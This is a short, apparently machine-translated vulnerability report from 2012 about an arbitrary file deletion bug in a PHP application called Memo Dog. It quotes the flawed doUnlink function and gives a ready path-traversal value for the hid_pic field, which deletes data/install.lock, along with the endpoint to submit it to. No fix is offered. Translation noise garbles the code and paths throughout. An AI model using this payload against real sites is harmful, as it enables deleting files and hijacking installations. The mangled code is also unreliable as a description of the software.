Memo Dog arbitrary file delete-bug warning-the black bar safety net

ID MYHACK58:62201234712
Type myhack58
Reporter 佚名
Modified 2012-08-26T00:00:00


Use Conditions:

  1. Only limited to windows hosts,linux is invalid, at least in my present machine.)

  2. Registered user

  3. Need to delete of the file can read and write

In modules/ajax/event. mod. php

Protective remove the picture

function doUnlink($pic){

if(!$ pic) return false;

$type = trim(via strtolower(end(explode(".",$ pic))));

$exp = '././ images/event/[0-9]{1 0}'. MEMBER_ID.' _b.'.$ type;

if(ereg dividing the($exp,$pic)){


unlink(strtr($pic,'_b.',' _s.'));

return true;

}else {

return false;



The function in the onloadPic is called



$hid_pic = $this->Post['hid_pic'];

$eid = (int) $this->Post['id'];




As long as the$_FILES['pic']['name'] is not empty, then we can construct hid_pic.

hid_pic content:

././ images/event/1 2 3 4 5 6 7 8 9 0{MEMBER_ID}_b. {You want to delete the file suffix}/../../../{you want to delete the file}

For example, we want to remove./ data/install. lock file, and my MEMBER_ID is 2 then:

././ images/event/12345678902_b. lock/../../../data/install. lock

The local test is successful

Actual use:

In the index. php? mod=event&code=pevent

Upload the capture, and then in hid_pic beneath the fill././ images/event/12345678902_b. lock/../../../data/install. the lock can be

Repair solutions:

do it yourself